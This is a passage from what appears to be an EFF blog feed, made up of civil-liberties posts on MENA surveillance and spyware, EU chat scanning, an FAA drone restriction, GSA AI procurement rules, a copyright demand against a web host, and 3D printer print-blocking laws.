uprisings, Western critics endlessly debated how much credit to give social media itself. While in the background, security agencies across several MENA states reached a much simpler conclusion: if networked communication can help topple a dictator, then they needed to embed themselves deep inside those networks. Analyses of the rise of digital authoritarianism in MENA show how quickly officials pivoted from being surprised by online organizing to building systems to monitor and pre‑empt it. In the years after 2011, governments across the region poured money into tools that let them systematically watch what people said and did on major platforms. Foreign vendors set up monitoring centers and interception systems that let security agencies block tens of thousands of sites, scrape and analyze social media at scale, monitor activist pages and online communities, and track activists in real time. They built a new, pre‑emptive model of digital control, one that assumes the state should see as much as possible, as early as possible. As we noted in 2011, exporting permanent surveillance infrastructure to already‑abusive governments doesn’t “modernize” public safety; it locks in an architecture of control that is primed to abuse dissidents, journalists, and marginalized communities. Domestic Lawfare and Cyber-Mercenaries After the uprisings, a number of governments also rewrote the rules that govern online life. Cybercrime laws, “fake news” provisions, and overbroad public‑order and ‘morality’ offences gave prosecutors and security agencies legal cover to act with impunity. Governments in Saudi Arabia, Tunisia, Jordan, and Egypt combined counterterrorism, cybercrime, defamation, and protest laws into a legal thicket designed to make online dissent feel dangerous and costly. Morality laws and cybercrime provisions are used to target queer and trans people based on identity and expression.​ At the United Nations, a new global cybercrime convention now risks baking this logic into international law. The convention was adopted by the UN General Assembly in late 2024, despite serious human rights concerns raised by civil society. Echoing our partners, EFF warned at the time that the UN cybercrime draft convention remained too flawed to adopt and urged states to reject the draft language because it legitimized expansive surveillance powers and criminalized legitimate expression, security research, and everyday digital practices around the world. While on paper, these instruments gesture to “public safety” objectives, in practice they function as pathways for state security agencies to monitor, prosecute, and silence the communities most at risk. For state-targeted communities, that makes being visible online a calculated risk, not a neutral choice.​​ Criminal codes are only half the story; mercenary tech is the other. As governments worldwide looked for ways to outpace their critics, a parallel market emerged to help them infiltrate and take over devices. Companies like NSO Group marketed Pegasus and similar tools as off‑the‑shelf capabilities for governments that wanted to hack a target’s cellphones or other devices to read messages, turn on microphones, and monitor entire social networks while bypassing the courts.  In 2019, UN Special Rapporteur David Kaye called for a global moratorium on the sale and transfer of private surveillance tools until real, enforceable safeguards exist. Two years later, forensic work by Amnesty and media partners showed how the same spyware used to hack phones of Palestinian human‑rights defenders was used to surveil journalists, activists, lawyers, and political opponents across dozens of countries.  Regional groups responded by demanding an end to the sale of surveillance technology to autocratic governments and security agencies, arguing that you cannot keep selling “lawful intercept” tools into systems where law itself is an instrument of repression. Commercial spyware is at the center of digital repression, not at its margins. Surveillance vendors are not neutral suppliers. Safeguards remain weak, fragmented, or nonexistent in most of the countries buying these tools, yet vendors continue seeking new contracts and new militarized “use cases.” Put bluntly, the companies that design, market, and maintain these systems precisely because they enable this kind of control profit from (and help entrench) authoritarian power. Biometrics, Facial Recognition, and AI‑Powered Surveillance Cities On top of this rapidly intensifying interception and spyware stack, governments and companies began layering biometrics and face recognition into everyday systems, creating pathways for bulk data collection, automated analysis, and risk profiling. In parts of MENA, national ID schemes, border and migration controls, and centralized biometric databases have been rolled out in environments with weak or captured data‑protection laws, making it easy to link people’s movements, services, and political activity to a single, persistent identifier.​ Humanitarian programs are not exempt from this protocol. In Jordan, Syrian refugees have been required to submit iris scans and biometric data to access cash assistance and food, turning “consent” into a precondition for survival. When access to aid depends on enrollment in centralized biometric systems, any breach, misuse, or repurposing of that data can have severe, life‑altering consequences for people who have no realistic way to opt out. Investigations into surveillance‑tech firms complicit in abuses in MENA show that vendors profit from supplying biometric and surveillance tools for migration management and internal security, even when those tools are used in discriminatory or abusive ways.​ Like elsewhere, mass surveillance technologies in MENA were first piloted on people who were already criminalized or made vulnerable by poverty. But their use quickly expanded from narrow, security‑framed deployments to routine use in city streets. As hardware sensors, cameras, and data storage got cheaper, “smart city” surveillance systems promised seamless security and services, and it became easier and less politically contentious to keep these systems running everywhere, all the time.​ Unlike targeted hacking tools, these broad, city‑wide surveillance infrastructures erase any practical line between people under investigation and the broad public, normalizing bulk, indiscriminate monitoring of public space and everyday movement. In the Gulf, facial recognition and dense sensor networks are increasingly built into high‑profile “smart city” and mega‑project plans that lean heavily on biometric and AI‑driven monitoring. These are security‑first development projects where biometric and sensor infrastructures are designed from the outset to embed policing, migration control, and commercial tracking into the urban fabric. In this vision of the Gulf’s “smart city” future—often sold as seamless services and digital opportunity—“smart” is the branding, and pervasive monitoring is the operating principle.​​ EFF has consistently opposed government use of face recognition and biometric surveillance, in some instances calling for outright bans. In contexts that treat peaceful dissent as a security threat, embedding biometric surveillance into everyday infrastructure locks in a balance of power that favors militarized policing and state control. That infrastructure is now the starting point for a new set of risks. Surveillance systems built over the last decade are being repackaged as the foundation for a new generation of “AI‑enabled” defense and security products.  Companies that once focused on video management or perimeter security now advertise “defense applications” for AI‑driven situational awareness and threat detection, using computer‑vision models to scan camera feeds, compare against existing watchlists, and flag “suspicious” people or behaviors in real time. Drone and sensor platforms are being upgraded with embedded AI that tracks and classifies targets autonomously and with “drone‑based AI threat detection and intelligent situational awareness,” turning aerial surveillance into a continuous data feed for security agencies and militaries. In smart‑city and defense expos from the Gulf to Europe and North America, similar systems are marketed as neutral efficiency upgrades or tools to “protect critical infrastructure,” even where they are explicitly designed to scale up border enforcement, protest surveillance, and internal security operations. As these systems are folded into AI‑driven defense products, the line between “civilian” infrastructure and militarized surveillance disappears, turning streets, borders, and aid sites into continuous input for security operations. That is the landscape that human rights and accountability efforts now have to confront. Templates of Control, Networks of Resistance The patterns established in heavily securitized MENA states after the Arab Spring now shape how states monitor and crush more recent uprisings, from Iran’s use of location data and facial recognition to track down protesters to long‑running crackdowns elsewhere in the region. This model of “digital authoritarianism” built on spyware, data‑hungry ID systems, platform control, and emergency‑style security laws has emerged everywhere from Latin America to Eastern Europe to here in the United States. As the new UN Cybercrime Convention moves toward implementation, its broad offences and surveillance powers risk turning this ad hoc toolkit into a formal template for cross‑border data‑sharing, repression, and an all‑purpose global surveillance instrument. For people on the ground, none of this is theoretical. Human‑rights defenders, journalists, and ordinary users across the region face arrest, long prison sentences, and exile based on their digital traces. In that context, commercial spyware is not a marginal issue but part of the core machinery of repression. Pegasus has been used to hack journalists’ phones through zero‑click exploits and compromise human‑rights defenders and watchdog organizations themselves, including staff at Amnesty’s Pegasus Project partners and Human Rights Watch. These deployments give practical effect to the “cybercrime” and “terrorism” frameworks described earlier: person‑by‑person campaigns against particular communities, contacts, and networks, rather than “neutral,” generalized security measures. Under these conditions, everyday security becomes a second job. People describe carrying multiple phones, keeping one for relatively “clean” uses and others for riskier conversations, splitting identities across platforms, using coded language, and moving their organizing off mainstream services when possible. Pushing this burden onto users is a political choice: states, platforms, and vendors could build systems that are safe by design; instead, they externalize risk to the people they watch and punish. Even against that backdrop, civil society organizations have refused to capitulate to security agencies and vendors. Regional coalitions have demanded strict export controls and outright bans on selling intrusive surveillance tech to autocratic governments. Advocates have also pushed companies to do more than box‑ticking “due diligence.” Work with surveillance‑tech firms in the context of migration and border control has repeatedly shown that most are still far from serious human‑rights assessments, let alone willing to turn down these lucrative contracts. Many of the same governments that have been critical of others on the issue of human rights have hosted or licensed companies that build these tools, in some cases buying similar capabilities for their own security agencies. European authorities, for instance, have investigated FinFisher’s export of spyware “made in Germany” to Turkey and other non‑EU governments. Meanwhile, the NSO Group has at least 22 Pegasus contracts with security and law‑enforcement agencies in 12 EU countries. This is a transnational industry, not a localized problem. Against near impossible odds, people continue finding pathways to freedom. The global surveillance sector reinforces the same hierarchies and violence that people have found ways to survive for generations. Queer activists and others at the sharpest edges of this system have had to develop their own forms of resistance, including against biometric and data‑driven targeting. Encryption, circumvention tools, and security training are not silver bullets, but they remain essential for anyone trying to organize, document abuses, or simply exist online with a bit less risk. Resources like EFF’s Surveillance Self‑Defense are one piece of that ecosystem, alongside trainers and groups who have been doing this work on the ground for years.​ Defending the Future of Digital Dissent The Arab Spring is often remembered through images of packed squares and hopeful tweets. But contending with its aftermath means confronting the surveillance architecture built in its shadow: laws that turn online speech into a crime, spyware and biometric systems that turn phones and faces into tracking beacons, and platform practices that routinely sacrifice the people most at risk. None of that is inevitable, and none of it is confined to one part of the world. Accountability has to reach both governments and the companies that profit from arming them with these tools. That means pushing for far stronger limits on how surveillance tech is built, sold, and deployed; demanding meaningful transparency when these systems are used; and defending the tools people rely on to communicate and organize safely, including robust encryption and secure channels. It also means taking direction from the people and communities who have been navigating and resisting this landscape for years. Surveillance itself is transnational: tools, playbooks, and data moves across borders as easily as money. And so we, too, continue our work, documenting abuses, sharing security knowledge, and collectively organizing against these violent systems. ​This is the third installment of a blog series reflecting on the global digital legacy of the 2011 Arab uprisings. Read the rest of the series here.

  • EU Parliament Blocks Mass-Scanning of Our Chats—What's Next?
    by Christoph Schmon on April 7, 2026 at 7:24 pm

    The EU’s so-called Chat Control plan, which would mandate mass scanning and other encryption breaking measures, has had some good news lately. The most controversial idea, the forced requirement to scan encrypted messages, was given up by EU member states. And now, another win for privacy: the EU Parliament has dealt a real blow to voluntary mass-scanning of chats by voting to not prolong an interim derogation from e-Privacy rules in the EU. These rules allowed service providers, temporarily, to scan private communication.   But no one should celebrate just yet. We said there is more to it, and voluntary scanning is a key part. Unlike in the U.S., where there is no comprehensive federal privacy law, the general and indiscriminate scanning of people’s messages is not legal in the EU without a specific legal basis. The e-Privacy derogation law, which gave (limited) cover for such activities, has now expired. Does that mean mass scanning will stop overnight?   Not really.  Companies have continued similar scanning practices during past gaps. Google, Meta, Microsoft, and Snap have already signaled in a joint statement to “continue to take voluntary action on our relevant Interpersonal Communication Services.” Whether this indicates continued scanning of our private communication is not entirely clear, but what is clear is that such activity would now risk breaching EU law. Then again, lack of compliance with EU data protection and privacy rules is nothing new for big tech in Europe.  Most importantly, the “Chat Control” proposal for mandatory detection of child abuse material (CSAM) is still alive and being negotiated. It has shifted the focus toward so-called risk mitigation measures, such as problematic age verification and voluntary activities. If platforms are expected to adopt these as part of their compliance, they risk no longer being truly voluntary. While mass scanning may be gone on paper, some broader concerns remain.   So, where does this leave us? The immediate priority is to make sure the expired exception for mass scanning is not revived. At the same time, lawmakers need to pull the teeth from the currently negotiated Chat Control proposal by narrowing risk mitigation measures. This means ensuring that age verification does not become a default requirement and “voluntary activities” are not turned into an expectation to scan our communications.    As we said before, this is a zombie proposal. It keeps coming back and must not be allowed to return through the back door. 

  • Triple Header for Privacy’s Defender in New York
    by Aaron Jue on April 3, 2026 at 11:15 pm

    You’re invited on a journey inside the privacy battles that shaped the internet. EFF’s Executive Director Cindy Cohn has tangled with the feds, fought for your data security, and argued before judges to protect our access to science and knowledge on the internet. Join Cindy at three events in New York discussing her bestselling new book: Privacy's Defender: My Thirty-Year Fight Against Digital Surveillance, on sale now. All proceeds from the book benefit EFF. Find the full event details below, and RSVP to let us know if you can make it. April 20 - With Women in Security and Privacy (WISP) Join Women in Security and Privacy (WISP) and EFF for a conversation featuring American University Senior Professorial Lecturer Chelsea Horne and EFF Executive Director Cindy Cohn as they dive into data security, Federal access to data, and your digital rights. Privacy's Defender with WISPKennedys22 Vanderbilt Avenue, Suite 2400, New York, NY 10017Monday, April 20, 20266:00 pm to 8:00 pmREGISTER NOW April 21 - With Julie Samuels at Civic Hall Join Tech:NYC President and CEO Julie Samuels, in conversation with EFF Executive Director Cindy Cohn for a discussion about Cindy's work, her new book, and what we're all wondering: Can have private conversations if we live our lives online? Privacy's Defender at Civic HallCivic Hall124 E 14th St, New York, NY 10003Tuesday, April 21, 20266:00 pm to 9:00 pmREGISTER NOW April 23 - With Anil Dash at Brooklyn Public Library Join antitech Principal & Cofounder Anil Dash, in conversation with EFF Executive Director Cindy Cohn to discuss Cindy's new book: Privacy's Defender: My Thirty-Year Fight Against Digital Surveillance. Privacy's Defender at Brooklyn Public LibraryBrooklyn Public Library - Central Library, Info Commons Lab10 Grand Army Plz 1st floor, Brooklyn, NY 11238Thursday, April 23, 20266:00 pm to 7:30 pmREGISTER NOW "Privacy’s Defender is a compelling account of a life well lived and an inspiring call to action for the next generation of civil liberties champions."~Edward Snowden, whistleblower; author of Permanent Record Can't make it? Look for Cindy at a city (or web connection) near you! Find the latest tour dates on the Privacy’s Defender hub or follow EFF for more. Part memoir and part legal history for the general reader, Privacy’s Defender is a compelling testament to just how much privacy and free expression matter in our efforts to combat authoritarianism, grow democracy, and strengthen human rights. Thank you for being a part of that fight.Want to support the cause and get a copy of the new book? New or renewing EFF members can preorder one as their annual gift!

  • The FAA’s “Temporary” Flight Restriction for Drones is a Blatant Attempt to Criminalize Filming ICE
    by Sophia Cope on April 3, 2026 at 10:25 pm

    Legal intern Raj Gambhir was the principal author of this post. Update: On April 15, 2026 the FAA rescinded the TFR (FDC 6/4375) and instead issued an advisory (FDC 6/2824), which states:  [Drone] operators are advised to avoid flying in proximity to: Department of War (DOW), Department of Energy (Doe), Department of Justice (DOJ), and Department of Homeland security (DHS) covered mobile assets as defined in 10 U.S.C. 130i [DOW/DOD], 10 U.S.C. 6227 [DOE], and 6 U.S.C. 124n [DHS], including ground vehicle convoys and their associated escorts. [Drone] operators who fly within this airspace are warned that [the agencies] may take action that results in the interference, disruption, seizure, damaging, or destruction of unmanned [aircraft] deemed to pose a credible safety or security threat to covered mobile assets. [Drone] operators should therefore exercise caution when flying in proximity of all DOW, DOE, DOJ and DHS mobile assets." The Reporters Committee for Freedom of the Press (RCFP) plans to continue with its lawsuit (Levine v. FAA). Original post: The Trump administration has restricted the First Amendment right to record law enforcement by issuing an unprecedented nationwide flight restriction preventing private drone operators, including professional and citizen journalists, from flying drones within half a mile of any ICE or CBP vehicle. In January, EFF and media organizations including The New York Times and The Washington Post responded to this blatant infringement of the First Amendment by demanding that the FAA lift this flight restriction. Over two months later, we’re still waiting for the FAA to respond to our letter. The First Amendment guarantees the right to record law enforcement. As we have seen with the extrajudicial killings of George Floyd, Renée Good, and Alex Pretti, capturing law enforcement on camera can drive accountability and raise awareness of police misconduct. A 21-Month Long “Temporary” Flight Restriction? The FAA regularly issues temporary flight restrictions (TFRs) to prevent people from flying into designated airspace. TFRs are usually issued during natural disasters, or to protect major sporting events and government officials like the president, and in most cases last mere hours. Not so with the restriction numbered FDC 6/4375, which started on January 16, 2026. This TFR lasts for 21 months—until October 29, 2027—and covers the entire nation. It prevents any person from flying any unmanned aircraft (i.e., a drone) within 3000 feet, measured horizontally, of any of the “facilities and mobile assets,” including “ground vehicle convoys and their associated escorts,” of the Departments of Defense, Energy, Justice, and Homeland Security. Violators can be subject to criminal and civil penalties, and risk having their drones seized or destroyed. In practical terms, this TFR means that anyone flying their drone within a half mile of an ICE or CBP agent’s car (a DHS “mobile asset”) is liable to face criminal charges and have their drone shot down. The practical unfairness of this TFR is underscored by the fact that immigration agents often use unmarked rental cars, use cars without license plates, or switch the license plates of their cars to carry out their operations. Nor do they provide prior warning of those operations. The TFR is an Unconstitutional Infringement of Free Speech While the FAA asserts that the TFR is grounded in its lawful authority, the flight restriction not only violates multiple constitutional rights, but also the agency’s own regulations. First Amendment violation. As we highlighted in the letter, nearly every federal appeals court has recognized the First Amendment right of Americans to record law enforcement officers performing their official duties. By subjecting drone operators to criminal and civil penalties, along with the potential destruction or seizure of their drone, the TFR punishes—without the required justifications—lawful recording of law enforcement officers, including immigration agents.   Fifth Amendment violation. The Fifth Amendment guarantees the right to due process, which includes being given fair notice before being deprived of liberty or property by the government. Under the flight restriction, advanced notice isn’t even possible. As discussed above, drone operators can’t know whether they are within 3000 horizontal feet of unmarked DHS vehicles. Yet the TFR allows the government to capture or even shoot down a drone if it flies within the TFR radius, and to impose criminal and civil penalties on the operator. Violations of FAA regulations. In issuing a TFR, the FAA’s own regulations require the agency to “specify[] the hazard or condition requiring” the restriction. Furthermore, the FAA must provide accredited news representatives with a point of contact to obtain permission to fly drones within the restricted area. The FAA has satisfied neither of these requirements in issuing its nationwide ban on drones getting near government vehicles. EFF Demands Rescission of the TFR We don’t believe it’s a coincidence that the TFR was put in place in January 2026, at the height of the Minneapolis anti-ICE protests, shortly after the killing of Renée Good and shortly before the shooting of Alex Pretti. After both of those tragedies, civilian recordings played a vital role in contradicting the government’s false account of the events. By punishing civilians for recording federal law enforcement officers, the TFR helps to shield ICE and other immigration agents from scrutiny and accountability. It also discourages the exercise of a key First Amendment right. EFF has long advocated for the right to record the police, and exercising that right today is more important than ever. Finally, while recording law enforcement is protected by the First Amendment, be aware that officers may retaliate against you for exercising this right. Please refer to our guidance on safely recording law enforcement activities.

  • Tech Nonprofits to Feds: Don’t Weaponize Procurement to Undermine AI Trust and Safety
    by Corynne McSherry on April 3, 2026 at 5:37 pm

    While the very public fight continues between the Department of Defense and Anthropic over whether the government can punish a company for refusing to allow its technology to be used for mass surveillance, another agency of the U.S. government is quietly working to ensure that this dispute will never happen again. How? By rewriting government procurement rules. Using procurement — meaning, the processes by which governments acquire goods and services — to accomplish policy goals is a time-honored and often appropriate strategy. The government literally expresses its politics and priorities by deciding where and how it spends its money. To that end, governments can and should give our tax dollars to companies and projects that serve the public interest, such as open-source software development, interoperability, or right to repair. And they should withhold those dollars from those that don’t, like shady contractors with inadequate security systems. New proposed rules for the principal agency in charge of acquiring goods, property, and services for the federal government, the General Services Administration (GSA), are supposed to be primarily an effort to implement one policy priority: promoting “ideologically neutral” American AI innovation. But the new guidelines do far more than that. As explained in comments filed today with our partners at the Center for Democracy and Technology, the Protect Democracy Project, and the Electronic Privacy Information Center, the GSA’s guidelines include broad provisions that would make AI tools less safe and less useful. If finally adopted, these provisions would become standard components of every federal contract. You can read the full comments here. The most egregious example is a requirement that contractors and government service providers must license their AI systems to the government for “all lawful purposes.” Given the government’s loose interpretations of the law, ability to find loopholes to surveil you, and willingness to do illegal spying, we need serious and proactive legal restrictions to prevent it from gobbling up all the personal data it can acquire and using even routine bureaucratic data for punitive ends. Relatedly, the draft rules require that “AI System(s) must not refuse to produce data outputs or conduct analyses based on the Contractor’s or Service Provider’s discretionary policies.” In other words, if a company’s safety guardrails might prevent responding to a government request, the company must disable those guardrails. Given widespread public concerns about AI safety, it seems misguided, at best, to limit the safeguards a company deems necessary. There are myriad other problems with the draft rules, such as technologically incoherent “anti-Woke” requirements. But, the overarching problem is clear: much of this proposal would not serve the overall public interest in using American tax dollars to promote privacy, safety, and responsible technological innovation. The GSA should start over.

  • Double Shot of Privacy's Defender in D.C.
    by Aaron Jue on April 3, 2026 at 3:58 pm

    You’re invited on a journey inside the privacy battles that shaped the internet. EFF’s Executive Director Cindy Cohn has tangled with the feds, fought for your data security, and argued before judges to protect our access to science and knowledge on the internet. Join Cindy at two events in Washingtion, D.C. on April 13 and 14 discussing her new book: Privacy's Defender: My Thirty-Year Fight Against Digital Surveillance, on sale now. All proceeds from the book benefit EFF. Find the full event details below, and RSVP to let us know if you can make it. April 13 - With Gigi Sohn at Busboys & Poets Join longtime public advocate for universal, open and affordable networks Gigi Sohn, in conversation with EFF Executive Director Cindy Cohn for a discussion about Cindy's work, her new book, and what we're all wondering: Can have private conversations if we live our lives online? Privacy's Defender at Busboys & PoetsBusboys & Poets - 14th & V2021 14th St NW, Washington, DC 20009Monday, April 13, 20266:30 pm to 8:30 pm Register Now April 14 - With Women in Security and Privacy (WISP) Join Women in Security and Privacy (WISP) and EFF for a conversation featuring American University Senior Professorial Lecturer Chelsea Horne and EFF Executive Director Cindy Cohn as they dive into data security, Federal access to data, and your digital rights.  Privacy's Defender with WISPTrue Reformer Building - Lankford Auditorium1200 U St NW, Washington, DC 20009Tuesday, April 14, 20266:00 pm to 8:30 pm REGISTER NOW "Privacy’s Defender is a compelling account of a life well lived and an inspiring call to action for the next generation of civil liberties champions." ~Edward Snowden, whistleblower; author of Permanent Record Can't make it? Look for Cindy at a city (or web connection) near you! Find the latest tour dates on the Privacy’s Defender hub or follow EFF for more. Part memoir and part legal history for the general reader, Privacy’s Defender is a compelling testament to just how much privacy and free expression matter in our efforts to combat authoritarianism, grow democracy, and strengthen human rights. Thank you for being a part of that fight.Want to support the cause and get a copy of the new book? New or renewing EFF members can preorder one as their annual gift!

  • Weakening Speech Protections Will Punish All of Us—Not Just Meta
    by David Greene on April 2, 2026 at 10:43 pm

    Recently, a California Superior Court jury found that Meta and YouTube harmed a user through some of the features they offered. And a New Mexico jury concluded that Meta deceived young users into thinking its platforms were safe from predation.  It’s clear that many people are frustrated by big tech companies and perhaps Meta in particular. We, too, have been highly critical of them and have pushed for years to end their harmful corporate surveillance. So it’s not surprising that a jury felt like Mark Zuckerberg and his company, along with YouTube, needed to be held accountable.  While it would be easy to claim that these cases set a legal precedent that should make social media companies fearful, that’s not exactly true. And that’s actually a good thing for the internet and its users.  These jury trials were just an early step in a long road through the court system. These cases will now go up on appeal, where the courts’ rulings about the First Amendment and immunity under Section 230 will likely get reconsidered.  As we have argued many times before, the First Amendment protects both user speech and the choices platforms make on how to deliver that speech (in the same way it protects newspapers' right to curate their editorial pages as they see fit). Features on social media sites that are designed to connect users cannot be separated from the users’ speech, which is why courts have repeatedly held that these features are indeed protected.  So while it may be tempting to celebrate these juries’ decisions as a "win" against big tech, in fact the ramifications of lowering First Amendment and immunity standards on other speakers—ones that members of the public actually like, and do not want to punish—are bad. We can’t create less protective speech rules for Meta and Google alone just because we want them held accountable for something else. As we have often said, much of the anger against these companies arises from people rightfully feeling that these companies harvest and exploit their data, and monetize their lives for crass economic reasons. We therefore continue to urge Congress to pass a comprehensive national privacy law with a private right of action to address these core concerns.

  • A Baseless Copyright Claim Against a Web Host—and Why It Failed
    by Betty Gedlu on April 2, 2026 at 9:34 pm

    Copyright law is supposed to encourage creativity. Too often, it’s used to extract payouts from others. Higbee & Associates, a law firm known for sending copyright demand letters to website owners, targeted May First Movement Technology, accusing it of infringing a photograph owned by Agence France-Presse (AFP). The claim was baseless. May First didn’t post the photo. It didn’t even own the website where the photo appeared. May First is a nonprofit membership organization that provides web hosting and technical infrastructure to social justice groups around the world. The allegedly infringing image was posted years ago by one of May First’s members, a human rights group based in Mexico. When May First learned about the copyright complaint, it ensured that the group removed the image. That should have been the end of it. Instead, the firm demanded payment. So EFF stepped in as May First’s counsel and explained why AFP and Higbee had no valid claim. After receiving our response, Higbee backed down. This outcome is a reminder that targets of copyright demands often have strong defenses—especially when someone else posted the material. Hosting Content Isn’t the Same as Publishing It Copyright law treats those who create or control content differently from those who simply provide the tools or infrastructure for others to communicate. In this case, May First provided hosting services but didn’t post the photo. Courts have long recognized that service providers aren’t direct infringers when they merely store material at the direction of users. In those cases, service providers lack “volitional conduct”—the intentional act of copying or distributing the work. Copyright law also recognizes that intermediaries can’t realistically police everything users upload. That’s why legal protections like the Digital Millennium Copyright Act safe harbors exist. Even outside those safe harbors, courts still shield service providers from liability when they promptly respond to notices. May First did exactly what the law expects: it notified its member, and the image came down. A Claim That Should Have Been Withdrawn Much Sooner The troubling part of this story isn’t just that a demand was sent. It’s that Higbee and AFP continued to demand money and threaten litigation after May First explained that it was merely a hosting provider and had the image removed. In other words, the claim was built on shaky legal ground from the start. Once May First explained its role, Higbee should have withdrawn its demand. Individuals and small nonprofits shouldn’t need lawyers just to stop aggressive copyright shakedowns. Statutory Damages Fuel Copyright Abuse This isn’t an isolated case—it’s a predictable result of copyright law’s statutory damages regime. Statutory damages can reach $150,000 per work, regardless of actual harm. That enormous leverage incentivizes firms like Higbee to send mass demand letters seeking quick settlements. Even meritless claims can generate revenue when recipients are too afraid, confused, or resource-constrained to fight back. This hits community organizations, independent publishers, and small service providers that don’t have in-house legal teams especially hard. Faced with the threat of ruinous statutory damages, many just pay what is demanded. That’s not how copyright law should work. Know Your Rights If you receive a copyright demand based on material someone else posted, don’t assume you’re liable. You may have defenses based on: Your role as a hosting or service provider Lack of volitional conduct Prompt removal of the material after notice The statute of limitations The copyright owner’s failure to timely register the work The absence of actual damages Every situation is different, but the key point is this: a demand letter is not the same as a valid legal claim. Standing Up to Copyright Trolls May First stood its ground, and Higbee abandoned its demand after we explained the law. But the bigger problem remains. Copyright’s statutory damages framework enables aggressive enforcement tactics that targets the wrong parties, and chills lawful online activity. Until lawmakers fix these structural incentives, organizations and individuals will keep facing pressure to pay up—even when they’ve done nothing wrong. If you get one of these demand letters, remember: you may have more rights than it suggests. EFF Letter to Higbee and Associates, March 4, 2026

  • Print Blocking Won't Work - Permission to Print Part 2
    by Cliff Braun on April 2, 2026 at 5:57 pm

    This is the second post in a series on 3D print blocking, for the first entry check out: Print Blocking is Anti-Consumer - Permission to Print Part 1 Legislators across the U.S. are proposing laws to force “print blockers” on 3D printers sold in their states. This mandated censorware is doomed to fail for its intended purpose, but will still manage to hurt the professional and hobbyist communities relying on these tools. 3D printers are commonly used to repair belongings, decorate homes, print figurines, and so much more. It’s not just hobbyists; 3D printers are also used professionally for parts prototyping and fixturing, small-batch manufacturing, and workspace organization. In rare cases, they’ve also been used to print parts needed for firearm assembly. Many states have already banned manufacturing firearms using computer controlled machine tools, which are called “Computer Numerical Control or CNC machines,” and 3D printers without a license. Recently proposed laws seek to impose technical limitations onto 3D printers (and in some cases, CNC machines) in the hope of enforcing this prohibition. This is a terrible idea; these mandates will be onerous to implement and will lock printer users into vendor software, impose one-time and ongoing costs on both printer vendors and users, and lay the foundation for a 3D-print censorship platform to be used in other jurisdictions. We dive more into these issues in the first part of this series. On a pragmatic level, however, these state mandates are just wishful thinking. Below, we dive into how 3D printing works, why these laws won’t deter the printing of firearms, and how regular lawful use will be caught in the proposed dragnet. How 3D Printers Work To understand the impact of this proposed legislation, we need to know a bit about how 3D printers work. The most common printers work similarly to a computer-controlled hot glue gun on a motion platform; they follow basic commands to maintain temperature, extrude (push) plastic through a nozzle, and move a platform. These motions together build up layers to make a final “print.” Modern 3D printers often offer more features like Wi-Fi connectivity or camera monitoring, but fundamentally they are very simple machines. The basic instructions used by most 3D printers are called Geometric Code, or G-Code, which specify very basic motions such as “move from position A to position B while extruding plastic.” The list of commands that will eventually print up a part are transferred to the printer in a text file thousands-to-millions of lines long. The printer dutifully follows these instructions with no overall idea of what it is printing. While it is possible to write G-Code by hand for either a CNC machine or a 3D printer, the vast majority is generated by computer aided manufacturing (CAM) software, often called a “slicer” in 3D printing since it divides a 3D model into many 2D slices then generates motion instructions.  This same general process applies to CNC machines which use G-Code instructions to guide a metal removal tool. CNC machines have been included in previous prohibitions on firearm manufacturing and file distribution and are also targeted in some of these bills. There are other types of 3D printers such as those that print concrete, resin, metal, chocolate and other materials using slightly different methods. All of these would be subject to the proposed requirements regardless of how unlikely doing harm with a gun made out of chocolate would be.  Simple rectangular 3D model for test fit Part of a 173490 line long G-Code file produced by slicer for simple rectangular model. Part of a 173,490 line long G-Code file for a simple rectangular part. How is Firearm Detection Supposed to Work? Under these proposed laws, manufacturers of consumer 3D printers must ensure their printers only work with their software, and implement firearm detection algorithms on either the printer itself or in a slicer software. These algorithms must detect firearm files using a maintained database of existing models. Vendors of printers must then verify that printers are on the allow-list maintained by the state before they can offer them for sale. Owners of printers will be guilty of a crime if they circumvent these intrusive scanning procedures or load alternative software, which they might do because their printer manufacturer ends support. Owners of existing noncompliant 3D printers in regulated states will be unable to resell their printers on the secondary market legally. What Will Actually Happen? While the proposed laws allow for scanning to happen on either the printer itself or in the slicer software, the reality is more complicated.  The computers inside many 3D printers have very limited computational and storage ability; it will be impossible for the printer’s computer to render the G-Code into a 3D model to compare with the database of prohibited files. Thus the only way to achieve this through the machine would be to upload all printer files to a cloud comparison tool, creating new delays, errors, and unacceptable invasions of privacy. Many vendors will instead choose to permanently link their printers to a specific slicer that implements firearm detection. This requires cryptographic signing of G-Code to ensure only authorized prints are completed, and will lock 3D printer owners into the slicer chosen by their printer vendor. Regardless of the specifics of their implementation, these algorithms will interfere with 3D printers' ability to print other parts without actually stopping manufacture of guns. It takes very little skill for a user to make slight design tweaks to either a model or G-Code to evade detection. One can also design incomplete or heavily adorned models which can be made functional with some post-print alterations. While this would be pioneered by skilled users—like the ones who designed today’s 3D printed guns—once the design and instructions are out there anyone able to print a gun today will be able to follow suit.   Firearm part identification features also impose costs onto 3D printer manufacturers, and hence their end consumers. 3D printer manufacturers must develop or license these costly algorithms and continuously maintain and update both the algorithm and the database of firearm models. Older printers that cannot comply will not be able to be resold in states where they are banned, creating additional E-waste. While those wishing to create guns will still be able to do so, people printing other functional parts will likely be caught up in these algorithms, particularly for things like film props, kids’ toys, or decorative models, which often closely resemble real firearms or firearm components. What Are The Impacts of These Changes? Technological restrictions on manufacturing tools’ abilities are harmful for many reasons. EFF is particularly concerned with this regulation locking a 3D printer to proprietary vendor software. Vendors will be able to use this mandate to support only in-house materials, locking users into future purchases. Vendor slicer software is often based on out-of-date, open source software, and forcing users to use that software deprives them of new features or even use of their printer altogether if the vendor goes out of business. At worst, some of these bill will make it a misdemeanor to fix those problems and gain full control of your printer. File-scanning frameworks required by this regulation will lay the foundation for future privacy and freedom intrusions. This requirement could be co-opted to scan prints for copyright violations and be abused similar to DMCA takedowns, or to suppress models considered obscene by a patchwork of definitions. What if you were unable to print a repair part because the vendor asserted the model was in violation of their trademark? What if your print was considered obscene? Regardless of your position on current prohibitions on firearms, we should all fight back against this effort to force technological restrictions on 3D printers, and legislators must similarly abandon the idea. These laws impose real costs and potential harms among lawful users, lay the groundwork for future censorship, and simply won’t deter firearm printing. 

  • Print Blocking is Anti-Consumer - Permission to Print Part 1
    by Rory Mir on April 2, 2026 at 5:56 pm

